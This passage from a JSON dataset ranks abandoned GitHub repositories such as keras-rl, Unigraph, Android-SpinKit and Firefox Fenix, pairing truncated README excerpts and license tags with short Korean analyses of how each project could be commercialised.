https://gitter.im/keras-rl/Lobby](https://badges.gitter.im/keras-rl/Lobby.svg)](https://gitter.im/keras-rl/Lobby)\n\n<table>\n  <tr>\n    <td><img src=\"/assets/breakout.gif?raw=true\" width=\"200\"></td>\n    <td><img src=\"/assets/cartpole.gif?raw=true\" width=\"200\"></td>\n    <td><img src=\"/assets/pendulum.gif?raw=true\" width=\"200\"></td>\n  </tr>\n</table>\n\n## What is it?\n\n`keras-rl` implements some state-of-the art deep reinforcement learning algorithms in Python and seamlessly integrates with the deep learning library [Keras](http://keras.io).\n\nFurthermore, `keras-rl` wo","composite_score":0.554,"license_safety_tag":"safe"},{"name":"unigraph-dev/unigraph-dev","github_url":"https://github.com/unigraph-dev/unigraph-dev","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":36,"description":"# Unigraph-dev 상용화 분석 보고서\n\n## 왜 보물인가\n개인의 모든 정보를 한 곳에서 관리하고 연결할 수 있는 '개인용 정보 허브' 기술로, 노션, 에버노트 같은 도구들을 대체할 수 있는 잠재력을 가지고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개인정보 관리 SaaS**\n직장인과 프리랜서가 업무, 일정, 연락처, 포트폴리오를 통합 관리하는","readme_excerpt":"# Unigraph\n\nA local-first and universal knowledge graph, personal search engine, and workspace for your life.\n\nPlease join the Discord community below to talk about contributing, or open a GitHub issue if you want to help!\n\n[![Discord](https://img.shields.io/discord/835194192044621885.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/vDTkKar5Vz)\n\n## Docs\n\n- [🧭 Docs home: Unigraph Developer Documentation](https://docs.unigraph.dev/)\n- [Data model](<./docs/Data model.md>)\n- [Glossary](./docs/Glossary.md)\n\nLicense:\n[MIT](https://github.com/unigraph-dev/unigraph-dev/blob/main/LICENSE)\n\n## Getting started\n\n### Running with Docker image\n\nWe provide an experimental Dockerfile for easy setup:\n\n- Building Unigraph: `docker build -t unigraph-devserver .` (this should take roughly 10 minutes max),\n- Running Unigraph: `docker run -d -p 4002:4002 -v <data directory>:/opt/unigraph -p 4001:4001 -p 3000:3000 -P unigraph-devserver`, \n- Open `http://localhost:3","composite_score":0.5538,"license_safety_tag":"safe"},{"name":"mercyblitz/geekbang-lessons","github_url":"https://github.com/mercyblitz/geekbang-lessons","stars":12,"language":"Java","license":"Apache-2.0","abandonment_months":35,"description":"# geekbang-lessons 상용화 분석\n\n## 왜 보물인가\n개발자들이 실무에서 필요한 핵심 기술을 체계적으로 배울 수 있는 커리큘럼과 예제 코드를 모아놓은 학습 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 기존 강의 영상에 실습 예제와 진도 관리 기능을 추가하여 구독형 학습 서비스로 운영\n2. **기업 직무 교육 도구*","readme_excerpt":"# geekbang-lessons\n极客时间课程工程\n","composite_score":0.5535,"license_safety_tag":"safe"},{"name":"ybq/Android-SpinKit","github_url":"https://github.com/ybq/Android-SpinKit","stars":9,"language":"Java","license":"MIT","abandonment_months":36,"description":"# Android-SpinKit 상업화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자가 기다릴 때 표시되는 회전하는 로딩 애니메이션을 간편하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발 플랫폼 SaaS**: 저코딩/노코딩 앱 빌더에서 이 라이브러리를 내장하여 개발자들이 로딩 화면을 쉽게 디자인하도록 제공\n2. **모바일 개발사 ","readme_excerpt":"# Android-SpinKit\n>Android loading animations(I wrote a android edition according [SpinKit](https://tobiasahlin.com/spinkit))\n\n[Demo Apk](https://raw.githubusercontent.com/ybq/AndroidSpinKit/master/art/spinkit.apk)\n\n## Preview\n\n<img src=\"https://raw.githubusercontent.com/ybq/AndroidSpinKit/master/art/screen.gif\" width=\"240px\" height=\"240px\"/>\n\n<img src=\"https://raw.githubusercontent.com/ybq/AndroidSpinKit/master/art/screen2.gif\" width=\"200px\" height=\"200px\"/>\n\n## Gradle Dependency\n\n ``` gradle\ndependencies {\n    implementation 'com.github.ybq:Android-SpinKit:1.4.0'\n }\n ```\n\n\n## Usage\n- Xml\n\n ```xml\n<com.github.ybq.android.spinkit.SpinKitView\n     xmlns:app=\"http://schemas.android.com/apk/res-auto\"\n     android:id=\"@+id/spin_kit\"\n     style=\"@style/SpinKitView.Large.Circle\"\n     android:layout_width=\"wrap_content\"\n     android:layout_height=\"wrap_content\"\n     android:layout_gravity=\"center\"\n     app:SpinKit_Color=\"@color/colorAccent\" />         \n```\n \n- ProgressBar\n\n ```java\nProgressBa","composite_score":0.5529,"license_safety_tag":"safe"},{"name":"RedditSota/state-of-the-art-result-for-machine-learning-problems","github_url":"https://github.com/RedditSota/state-of-the-art-result-for-machine-learning-problems","stars":30,"language":"","license":"Apache-2.0","abandonment_months":84,"description":"# RedditSota/state-of-the-art-result-for-machine-learning-problems 분석\n\n## 왜 보물인가\n최신 인공지능 기술의 가장 좋은 성능 결과들을 한곳에 모아놓은 참고자료로, 어떤 AI 문제의 최고 수준 솔루션을 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **AI 솔루션 개발 회사**: 고객의 문제","readme_excerpt":"# State-of-the-art result for all Machine Learning Problems\n\n### LAST UPDATE: 20th Februray 2019\n\n### NEWS: I am looking for a Collaborator esp who does research in NLP, Computer Vision and Reinforcement learning. If you are not a researcher, but you are willing, contact me. Email me: yxt.stoaml@gmail.com\n\nThis repository provides state-of-the-art (SoTA) results for all machine learning problems. We do our best to keep this repository up to date.  If you do find a problem's SoTA result is out of date or missing, please raise this as an issue (with this information: research paper name, dataset, metric, source code and year). We will fix it immediately.\n\nYou can also submit this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSe_fFZVCeCVRGGgOQIpoQSXY7mZWynsx7g6WxZEVpO5vJioUA/viewform?embedded=true) if you are new to Github.\n\nThis is an attempt to make  one stop for all types of machine learning problems state of the art result. I can not do this alone. I need help from everyone. ","composite_score":0.5526,"license_safety_tag":"safe"},{"name":"theowenyoung/gatsby-theme-primer-wiki","github_url":"https://github.com/theowenyoung/gatsby-theme-primer-wiki","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":50,"description":"# Gatsby Theme Primer Wiki 분석\n\n## 왜 보물인가\n복잡한 문서 작업을 간단하게 자동화해주는 도구로, 개인 블로그부터 회사 매뉴얼까지 누구나 쉽게 멋진 웹사이트를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 회사의 직원 교육 자료, 업무 매뉴얼, 프로젝트 문서를 한 곳에 모아 검색 가능하게 만드는 내부","readme_excerpt":"# Gatsby Theme Primer Wiki\n\nA Gatsby Theme for Wiki/Docs/Knowledge Base, which using [Primer style](https://primer.style/react/) as the UI theme, can work well with [Foam](https://github.com/foambubble/foam) or [Obsibian](https://obsidian.md/) or just markdown files.\n\nThis theme is inspired with [gatsby-project-kb](https://github.com/hikerpig/gatsby-project-kb), [gatsby-digital-garden](https://github.com/mathieudutour/gatsby-digital-garden) and [doctocat](https://primer.style/doctocat/)\n\n## Sites that use this theme\n\n- [Demo](https://demo-wiki.owenyoung.com) - ([Source](https://github.com/theowenyoung/gatsby-theme-primer-wiki/tree/main/example))\n- [Everything I Know by Owen](https://wiki.owenyoung.com/) - ([Source](https://github.com/theowenyoung/wiki))\n- [Foam Demo](https://demo-foam.owenyoung.com/) - ([Source](https://github.com/theowenyoung/foam-template-gatsby-theme-primer-wiki))\n- [Obsidian Demo](https://demo-obsidian.owenyoung.com/) - ([Source](https://github.com/theowenyoung/obs","composite_score":0.5526,"license_safety_tag":"safe"},{"name":"DeepGraphLearning/LiteratureDL4Graph","github_url":"https://github.com/DeepGraphLearning/LiteratureDL4Graph","stars":9,"language":"","license":"MIT","abandonment_months":66,"description":"","readme_excerpt":"Literature of Deep Learning for Graphs\n**************************************\n\nThis is a paper list about deep learning for graphs.\n\n.. raw:: html\n\n    <div><a href=\"README.rst\">Sort by topic</a></div>\n    <div><a href=\"BYVENUE.rst\">Sort by venue</a></div>\n\n.. contents::\n    :local:\n    :depth: 2\n\n.. sectnum::\n    :depth: 2\n\n.. role:: authors(emphasis)\n\n.. role:: venue(strong)\n\n.. role:: keywords(emphasis)\n\nNode Representation Learning\n============================\n\nUnsupervised Node Representation Learning\n-----------------------------------------\n\n`DeepWalk: Online Learning of Social Representations\n<https://arxiv.org/pdf/1403.6652>`_\n    | :authors:`Bryan Perozzi, Rami Al-Rfou, Steven Skiena`\n    | :venue:`KDD 2014`\n    | :keywords:`Node classification, Random walk, Skip-gram`\n\n`LINE: Large-scale Information Network Embedding\n<https://arxiv.org/pdf/1503.03578>`_\n    | :authors:`Jian Tang, Meng Qu, Mingzhe Wang, Ming Zhang, Jun Yan, Qiaozhu Mei`\n    | :venue:`WWW 2015`\n    | :keywords","composite_score":0.5525,"license_safety_tag":"safe"},{"name":"robbiehanson/CocoaHTTPServer","github_url":"https://github.com/robbiehanson/CocoaHTTPServer","stars":5,"language":"Objective-C","license":"bsd-3-clause","abandonment_months":32,"description":"# CocoaHTTPServer 사업화 분석\n\n## 왜 보물인가\nMac과 iPhone 앱에 웹 서버 기능을 쉽게 추가할 수 있는 오픈소스 도구로, Apple 기기 사용자들을 위한 다양한 앱 개발을 빠르게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **로컬 파일 공유 앱**: iPhone에 저장된 사진·문서를 Wi-Fi로 다른 기기에 공유하는 유료 앱","readme_excerpt":"# CocoaHTTPServer\n\n[![Build Status](https://travis-ci.org/robbiehanson/CocoaHTTPServer.svg)](https://travis-ci.org/robbiehanson/CocoaHTTPServer)\n [![Version](http://img.shields.io/cocoapods/v/CocoaHTTPServer.svg?style=flat)](http://cocoapods.org/?q=CocoaHTTPServer)\n [![Platform](http://img.shields.io/cocoapods/p/CocoaHTTPServer.svg?style=flat)]()\n [![License](http://img.shields.io/cocoapods/l/CocoaHTTPServer.svg?style=flat)](https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE)\n\nCocoaHTTPServer is a small, lightweight, embeddable HTTP server for Mac OS X or iOS applications.\n\nSometimes developers need an embedded HTTP server in their app. Perhaps it's a server application with remote monitoring. Or perhaps it's a desktop application using HTTP for the communication backend. Or perhaps it's an iOS app providing over-the-air access to documents. Whatever your reason, CocoaHTTPServer can get the job done. It provides:\n\n-   Built in support for bonjour broadcasting\n-   IPv4 ","composite_score":0.5524,"license_safety_tag":"safe"},{"name":"barbagroup/CFDPython","github_url":"https://github.com/barbagroup/CFDPython","stars":8,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":27,"description":"# CFDPython 상용화 분석\n\n## 왜 보물인가\n복잡한 유체 흐름 현상을 프로그래밍으로 시뮬레이션할 수 있는 교육용 코드로, 항공·자동차·건설 등 다양한 산업에서 설계 단계의 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 엔지니어링 교육 SaaS**\n대학 및 직업학교 학생들이 온라인으로 유체 역학을 배우고 실습할 수 있는 구독","readme_excerpt":"\n# CFD Python\n\n> Please cite as: Barba, Lorena A., and Forsyth, Gilbert F. (2018). CFD Python: the 12 steps to Navier-Stokes equations. _Journal of Open Source Education_, **1**(9), 21, https://doi.org/10.21105/jose.00021\n\n[![DOI](https://jose.theoj.org/papers/10.21105/jose.00021/status.svg)](https://doi.org/10.21105/jose.00021)\n\n**CFD Python**, a.k.a. the **12 steps to Navier-Stokes**, is a practical module for learning the foundations of Computational Fluid Dynamics (CFD) by coding solutions to the basic partial differential equations that describe the physics of fluid flow.\nThe module was part of a course taught by [Prof. Lorena Barba](http://lorenabarba.com) between 2009 and 2013 in the Mechanical Engineering department at Boston University (Prof. Barba since moved to the George Washington University).\n\nThe module assumes only basic programming knowledge (in any language) and some background in partial differential equations and fluid mechanics. The \"steps\" were inspired by ideas o","composite_score":0.5522,"license_safety_tag":"unknown"},{"name":"DevMadhup/Wanderlust-Mega-Project","github_url":"https://github.com/DevMadhup/Wanderlust-Mega-Project","stars":50,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"","readme_excerpt":"","composite_score":0.5521,"license_safety_tag":"safe"},{"name":"mozilla-mobile/fenix","github_url":"https://github.com/mozilla-mobile/fenix","stars":8,"language":"Kotlin","license":"MPL-2.0","abandonment_months":40,"description":"# mozilla-mobile/fenix 사업화 분석\n\n## 왜 보물인가\nFirefox 모바일 브라우저의 핵심 코드로, 수억 명이 사용하는 완성된 제품의 기술 기반이 공개되어 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 브라우저 SaaS**: 엔터프라이즈용 보안 강화 브라우저를 구독 모델로 판매 (연간 직원당 $50-100)\n2. **기업 보안 ","readme_excerpt":"# Firefox for Android\n\n[![Task Status](https://firefox-ci-tc.services.mozilla.com/api/github/v1/repository/mozilla-mobile/fenix/main/badge.svg)](https://firefox-ci-tc.services.mozilla.com/api/github/v1/repository/mozilla-mobile/fenix/main/latest)\n[![codecov](https://codecov.io/gh/mozilla-mobile/fenix/branch/main/graph/badge.svg)](https://codecov.io/gh/mozilla-mobile/fenix)\n\nFenix (internal codename) is the all-new Firefox for Android browser, based on [GeckoView](https://mozilla.github.io/geckoview/) and [Mozilla Android Components](https://mozac.org/).\n\n<a href=\"https://play.google.com/store/apps/details?id=org.mozilla.firefox\" target=\"_blank\"><img src=\"https://play.google.com/intl/en_us/badges/images/generic/en-play-badge.png\" alt=\"Get it on Google Play\" height=\"90\"/></a>\n\n## Getting Involved\n\nPlease read the [Community Participation Guidelines](https://www.mozilla.org/en-US/about/governance/policies/participation/) and the [Bugzilla Etiquette guidelines](https://bugzilla.mozilla.org","composite_score":0.5519,"license_safety_tag":"unknown"},{"name":"hadyang/interview","github_url":"https://github.com/hadyang/interview","stars":5,"language":"","license":"GPL-3.0","abandonment_months":47,"description":"# hadyang/interview 프로젝트 분석\n\n## 왜 보물인가\n취업 준비생과 기업이 면접 준비를 체계적으로 할 수 있도록 돕는 오픈소스 플랫폼으로, 반복되는 면접 질문과 답변을 정리해두어 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 취업준비생 대상 월 구독형 AI 면접 코칭 서비스 (AI가 면접 답변을 ","readme_excerpt":"# Summary\n\n本文档收集整理 计算机、Java 相关基础知识，有问题欢迎提 [issue](https://github.com/hadyang/interview/issues/new) 👏\n\n页面生成工具：[Hugo](https://themes.gohugo.io/)\n\n主题：[hugo-book](https://themes.gohugo.io/hugo-book/)\n\n预览地址：[Interview](https://hadyang.github.io/interview/)\n","composite_score":0.5514,"license_safety_tag":"restricted"},{"name":"yl305237731/flexible-yolov5","github_url":"https://github.com/yl305237731/flexible-yolov5","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":21,"description":"# flexible-yolov5 상용화 분석\n\n## 왜 보물인가\n카메라로 찍은 영상에서 물체를 자동으로 인식하고 위치를 파악하는 AI 기술로, 보안·공장·배송 등 다양한 산업에서 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 영상분석 SaaS**: 편의점/주차장의 CCTV를 클라우드로 연결하면 자동으로 사람·물체를 감지해 알람 발송","readme_excerpt":"# flexible-yolov5\n\n\n<div align=center><img src=\"https://user-images.githubusercontent.com/9928596/191880047-a408e29c-4c6b-4e20-9318-0b23037ed64e.png\" width=\"600\" height=\"400\"/></div>\n\n\n*Update the code for  [ultralytics/yolov5](https://github.com/ultralytics/yolov5) version 6.1.*\n---\n代码基于U版YOLOv5  6.1版本. 根据 {backbone, neck, head} 重新组织了网络结构, 目前backbone 除了原始的YOLO外，还可选择 resnet, hrnet, swin-transformer, gnn, mobilenet 等主流backbone. 同时也可以自由的加入 SE, DCN, drop block 等插件. 可以很方便的对网络结构等进行替换、修改、实验. 同时提供了tensorrt 的c++、Python 推理, 量化. 以及Triton、tf_serving 部署代码. 每个backbone只选了一个训练300个epoch做对比，均无预训练权重，由于网络结构不同，我的结果并不能代表网络最终的结果，可以作为一个baseline参考. 这个项目适合想要各种改YOLO或者验证模块. 是如果你有什么好的idea，比如增加新的backbone, 插件等, 欢迎提PR, 使用时遇到什么问题, 也欢迎提issue. 如果对你有帮助, 感谢给颗♥(ˆ◡ˆԅ)小 ⭐️⭐️. \n---\nSplit the yolov5 model to {backbone, neck, head} to facilitate the operation of various modules and support more backbones.Basically, only change the model, and I didn't change the architecture, training and testing of yolov5. Therefore, if the or","composite_score":0.5512,"license_safety_tag":"restricted"},{"name":"vercel/og-image","github_url":"https://github.com/vercel/og-image","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":41,"description":"# Vercel OG Image 저장소 분석\n\n## 왜 보물인가\n소셜 미디어에 공유될 때 웹사이트가 예쁘게 표시되도록 자동으로 이미지를 만들어주는 도구로, 많은 웹사이트가 필요로 하는 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **블로그/뉴스 플랫폼**: 각 기사마다 자동으로 썸네일 이미지를 생성해 SNS 공유 시 시각적으로 돋보이게 함\n2. **전","readme_excerpt":"> **Warning** This repo is outdated and only works with Node.js 14. Please use [@vercel/og](https://vercel.com/blog/introducing-vercel-og-image-generation-fast-dynamic-social-card-images) for new projects.\n>\n> If you have a problem that reproduces using [the playground](https://og-playground.vercel.app), please create an issue in the [satori](https://github.com/vercel/satori) repo.\n> \n> For all other issues with `@vercel/og`, please reach out to [Vercel Support](https://vercel.com/help#issues).\n","composite_score":0.55,"license_safety_tag":"safe"},{"name":"raywenderlich/flta-materials","github_url":"https://github.com/raywenderlich/flta-materials","stars":10,"language":"Dart","license":"NOASSERTION","abandonment_months":27,"description":"# raywenderlich/flta-materials 분석 보고서\n\n## 왜 보물인가\nRay Wenderlich는 프로그래밍 교육으로 유명한 회사이므로, 이 저장소는 누구나 따라할 수 있는 체계적인 학습 자료 모음일 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초급자용 프로그래밍 강좌 콘텐츠로 활용하는 구독형 서비스\n2","readme_excerpt":"# Flutter Apprentice: Materials\n\nThis repo contains all the downloadable materials and projects associated with the **[Flutter Apprentice](https://kodeco.com/books/flutter-apprentice/)** from [Kodeco](https://www.kodeco.com).\n\nEach edition has its own branch, named `editions/[EDITION]`. The default branch for this repo is for the most recent edition.\n\n## Forum\n\nWe’ve set up an official forum for the book at [https://forums.kodeco.com/c/books/flutter-apprentice](https://forums.kodeco.com/c/books/flutter-apprentice). This is a great place to ask questions about the book or to submit any errors you may find.\n\n## Release History\n\n| Branch                                                                            | Edition | Release Date |\n| --------------------------------------------------------------------------------- |:-------:|:------------:|\n| [editions/1.0](https://github.com/kodecocodes/flta-materials/tree/editions/1.0) | 1.0     | 2021-06-02   |\n| [editions/2.0](https://github.com","composite_score":0.5496,"license_safety_tag":"unknown"},{"name":"progschj/ThreadPool","github_url":"https://github.com/progschj/ThreadPool","stars":6,"language":"C++","license":"Zlib","abandonment_months":22,"description":"# ThreadPool 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 여러 작업을 동시에 빠르게 처리할 수 있도록 돕는 핵심 기술로, 많은 사용자를 처리해야 하는 서비스의 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **채팅 서비스**: 수천 명의 사용자가 동시에 메시지를 주고받을 때 모두가 빠르게 응답받을 수 있게 함\n2. **내부 업무","readme_excerpt":"ThreadPool\n==========\n\nA simple C++11 Thread Pool implementation.\n\nBasic usage:\n```c++\n// create thread pool with 4 worker threads\nThreadPool pool(4);\n\n// enqueue and store future\nauto result = pool.enqueue([](int answer) { return answer; }, 42);\n\n// get result from future\nstd::cout << result.get() << std::endl;\n\n```\n","composite_score":0.5495,"license_safety_tag":"safe"},{"name":"kubernetes/heapster","github_url":"https://github.com/kubernetes/heapster","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":91,"description":"# Kubernetes Heapster 분석 보고서\n\n## 왜 보물인가\n클라우드 서버의 건강 상태와 성능을 자동으로 감시하고 기록하는 핵심 모니터링 도구로, 대규모 시스템 운영에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 모니터링 SaaS**: 기업 고객에게 서버 성능 대시보드를 월 구독 형태로 제공\n2. **내부 DevOps 도구**: ","readme_excerpt":"# Heapster\n\n***RETIRED***: Heapster is now retired.  See the [deprecation timeline](docs/deprecation.md)\nfor more information on support. We will not be making changes to Heapster.\n\nThe following are potential migration paths for Heapster functionality:\n\n- **For basic CPU/memory HPA metrics**: Use [metrics-server](https://github.com/kubernetes-incubator/metrics-server).\n\n- **For general monitoring**: Consider a third-party monitoring pipeline that can gather Prometheus-formatted metrics.\n  The kubelet exposes all the metrics exported by Heapster in Prometheus format.\n  One such monitoring pipeline can be set up using the [Prometheus Operator](https://github.com/coreos/prometheus-operator), which\n  deploys Prometheus itself for this purpose.\n\n- **For event transfer**: Several third-party tools exist to transfer/archive Kubernetes events, depending on your sink.\n  [heptiolabs/eventrouter](https://github.com/heptiolabs/eventrouter) has been suggested as a general alternative.\n\n[![GoDoc](h","composite_score":0.5494,"license_safety_tag":"safe"},{"name":"itheima1/BlockChain","github_url":"https://github.com/itheima1/BlockChain","stars":5,"language":"JavaScript","license":"CC-BY-SA-4.0","abandonment_months":29,"description":"# BlockChain 저장소 분석\n\n## 왜 보물인가\n블록체인 기술의 기초부터 실무까지 배울 수 있는 학습 자료로, 암호화폐와 디지털 자산 관련 사업을 시작하려는 사람들에게 필수적인 지식을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **교육 SaaS**: 블록체인 입문자를 위한 온라인 강좌 플랫폼으로 패키징하여 월 구독료 수집\n- **기업 교육 도구**:","readme_excerpt":"## 黑马程序员 120天全栈区块链开发\n\n\n\n\n\n### 写在前面\n据说2018年谈区块链的10个人中有9个都是骗子, \n一些机构自己都没搞懂区块链是什么, \n就打着区块链的噱头招生了\n\n讲解几个helloworld程序就说是区块链开发了\n\n区块链是综合性的技术栈, \n单单掌握一门语言肯定是不够的.\n为了防止劣币驱逐良币,\n为了区块链技术在国内快速的普及, \n为了千万人少走弯路,\n传智播客智能物联网+区块链学院决定github开源全套就业班课程.  \n\n欢迎大家star. \n\n### 开源目的\n1. 课程历时两年课程研发, 所有区块链框架均用最新版本授课, 全力推动新技术在中国的普及\n2. 深入浅出讲解, 用短的学习曲线让Java程序员和JavaScript程序员快速掌握区块链技术\n3. 普及区块链知识, 帮助各公司CTO理解区块链的业务场景\n4. 课程包含超多案例分析, 帮助企业和政府采用区块链技术解决痛点问题\n5. 学完课程后,可以**独立**完成区块链项目的设计和开发\n6. 学完课程后,可以满足公司对区块链开发工程师的要求, 解决社会人才供不应求的问题\n\n### 课程服务\n1. 开源课程全部免费,  随着传智播客面授班级授课周期, 同步开源更新\n2. 但因区块链技术变化日新月异, 课程中部分工具和方法可能会随着版本的更新失效, 关于课程讲解若有更好的方式, 欢迎pull request.\n3. 没有毅力 自主学完全套课程的朋友,  可以报名传智播客 黑马程序员 区块链就业班\n\n   ​\n\n\n\n\n\n###课程详细信息：\n\n[课程详细信息链接](https://www.boxuegu.com/web/subject/002/index.html?a=YQVpLg&b=x7w7n9&utm_source=cebianlan)\n\n\n\n### 学习前提\n本套课程建议大家需要具备java基础, \njava基础全套视频:\n链接：https://pan.baidu.com/s/1mIAre7nvi5ubmLOnINV-fg 密码：gsvr\n\n\n\n\n### 课程课表\n\n - **第一周: java加强/kotlin/dsl/函数式编程/gradle/git/高阶函数/lambda表达式**\n    - 课程设计背景:\n      kotlin是一个非常具有潜力和启发性的编程语","composite_score":0.5493,"license_safety_tag":"unknown"},{"name":"gridsome/gridsome","github_url":"https://github.com/gridsome/gridsome","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":26,"description":"","readme_excerpt":"<p align=\"center\">\n  <br>\n  <a href=\"https://www.gridsome.org\">\n    <img src=\"https://raw.githubusercontent.com/gridsome/gridsome/master/.github/assets/logo.png\" width=\"90\"/>\n  </a>\n</p>\n\n<h1 align=\"center\">Gridsome</h1>\n<h3 align=\"center\">Build super fast, modern websites with Vue.js</h3>\n<p align=\"center\">\nGridsome is a <a href=\"//vuejs.org\">Vue-powered</a> static site generator for building CDN-ready websites for any headless CMS, local files or APIs\n</p>\n\n<p align=\"center\">\n  <a title=\"Total downloads\" href=\"https://www.npmjs.com/package/gridsome\">\n    <img src=\"https://img.shields.io/npm/dm/gridsome.svg?style=flat-square\">\n  </a>\n  <a title=\"Current version\" href=\"https://www.npmjs.com/package/gridsome\">\n    <img src=\"https://img.shields.io/npm/v/gridsome.svg?style=flat-square\">\n  </a>\n  <a title=\"MIT License\" href=\"LICENSE\">\n    <img src=\"https://img.shields.io/github/license/gridsome/gridsome.svg?style=flat-square\">\n  </a>\n  <a title=\"Follow on Twitter\" href=\"https://twitter.com","composite_score":0.5489,"license_safety_tag":"safe"},{"name":"Microsoft/TypeScript-React-Starter","github_url":"https://github.com/Microsoft/TypeScript-React-Starter","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":82,"description":"# TypeScript-React-Starter 분석\n\n## 왜 보물인가\n웹 애플리케이션을 만드는 데 필요한 기초 틀을 제공하여, 개발자들이 처음부터 복잡하게 설정할 필요 없이 바로 개발을 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 협업 도구나 프로젝트 관리 웹사이트의 초기 개발 기반으로 활용\n- **내부 업무","readme_excerpt":"This repo is now deprecated. In the time since it created [TypeScript support](https://facebook.github.io/create-react-app/docs/adding-typescript) is now a default feature of [Create React App](https://facebook.github.io/create-react-app/), [Next.JS](https://nextjs.org) and [Razzle](https://github.com/jaredpalmer/razzle). \r\n\r\nThis means you can get started with:\r\n\r\n```sh\r\n# Creates an app called my-app\r\nnpx create-react-app my-app --typescript\r\n\r\ncd my-app\r\n\r\n# Adds the type definitions\r\nnpm install --save typescript @types/node @types/react @types/react-dom @types/jest\r\n\r\necho \"Good to go :tada:\"\r\n```\r\n\r\nThis repo offers some exmples on how to take that project into production and handle testing and state. However, you can\r\nalso use the official documentation in the Create React App website for that. \r\n\r\nIf you'd like to know more about how to effectively do React with TypeScript, we recommend looking at the following:\r\n\r\n- [React+TypeScript Cheatsheets](https://github.com/typescript-","composite_score":0.5486,"license_safety_tag":"safe"},{"name":"taurusai/kungfu","github_url":"https://github.com/taurusai/kungfu","stars":8,"language":"C++","license":"Apache-2.0","abandonment_months":25,"description":"","readme_excerpt":"# Intro 简介\n\n[功夫核心库](https://libkungfu.cc) 是专为量化交易者设计的开源交易执行系统。功夫想要解决以下问题：\n* 低延迟交易 - 量化交易者对系统内响应速度有极高要求，功夫提供微秒级别的系统响应，支持带纳秒级时间戳的交易数据实时存储和盘后分析。\n* 开放的策略编写方式 - 功夫支持 Python 3 及 C++ 形式的策略编写，策略师可以不受限的自由使用第三方计算库，放飞创意。\n* 友好的使用方式 - 告别 Linux shell 小黑屋，功夫提供图形化操作界面，简化策略运维流程。而进阶用户仍然具备通过底层 API 以无界面形式使用系统的能力。\n* 跨平台运行 - 三大主流平台（Windows、MacOSX、Linux）皆可编译运行。\n\n功夫系统架构如下：\n* 后台核心（C++）\n  * 长拳（longfist） - 金融交易相关的数据格式定义，提供涵盖 c++/python/javascript/sqlite 的序列化支持。\n  * 易筋经（yijinjing） - 专为金融交易设计的超低延迟时间序列内存数据库，提供纳秒级时间精度，可落地交易相关的全部数据。\n  * 咏春（wingchun） - 策略执行引擎，提供策略开发接口，实时维护策略账目及持仓情况。\n* 策略接口（C++/Python）\n  * [RxCpp](https://github.com/ReactiveX/RxCpp) - 响应式事件处理框架，可对丰富数据类型的金融交易数据进行灵活处理。\n  * numpy/pandas - 自带的 Python 运行环境原生提供 numpy/pandas 等工具供策略使用。\n* 前端UI（Node.js）\n  * [Electron](https://electronjs.org) - 跨平台的桌面应用开发框架\n  * [Vue.js](https://vuejs.org) - UI开发框架\n\n功夫在系统设计上支持任意柜台的对接（涵盖中国所有股票、期货市场），功夫开源版提供 [XTP](https://xtp.zts.com.cn/) 柜台对接的参考实现。\n如果需要接入更多柜台请至 [功夫量化](https://www.kungfu-trader.com) 下载标准版或联系我们。\n\n初次使用请参考 [功夫核心库文档](ht","composite_score":0.5485,"license_safety_tag":"safe"},{"name":"withspectrum/spectrum","github_url":"https://github.com/withspectrum/spectrum","stars":5,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":47,"description":"# Spectrum 저장소 분석\n\n## 왜 보물인가\n온라인 커뮤니티를 쉽게 만들고 관리할 수 있는 플랫폼으로, 기업이나 팀이 자체 소셜 네트워크를 운영하려 할 때 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업이 자신의 고객·직원 커뮤니티를 월 구독으로 호스팅하는 서비스\n- **내부 업무 도구**: 대기업의 부서별 협업 공간이","readme_excerpt":"<div align=\"center\">\n\n[![Spectrum](./public/img/media.png)](https://spectrum.chat)\n\n### Simple, powerful online communities.\n\n</div>\n\nThis is the main monorepo codebase of [Spectrum](https://spectrum.chat). Every single line of code that's not packaged into a reusable library is in this repository.\n\n## What is Spectrum?\n\n### Vision\n\nIt is difficult to grow, manage and measure the impact of online communities. Community owners need modern, chat-based communities but are running into scaling issues when their community grows beyond a few hundred members. It becomes hard to keep track of who's who, know what conversations are happening, and ensure that the community is staying healthy and productive.\n\n**Spectrum aims to be the best platform to build any kind of community online by combining the best of forums and real-time chat apps.** With best-in-class moderation tooling, a single platform for all your communities, threaded conversations by default, community health monitoring, and 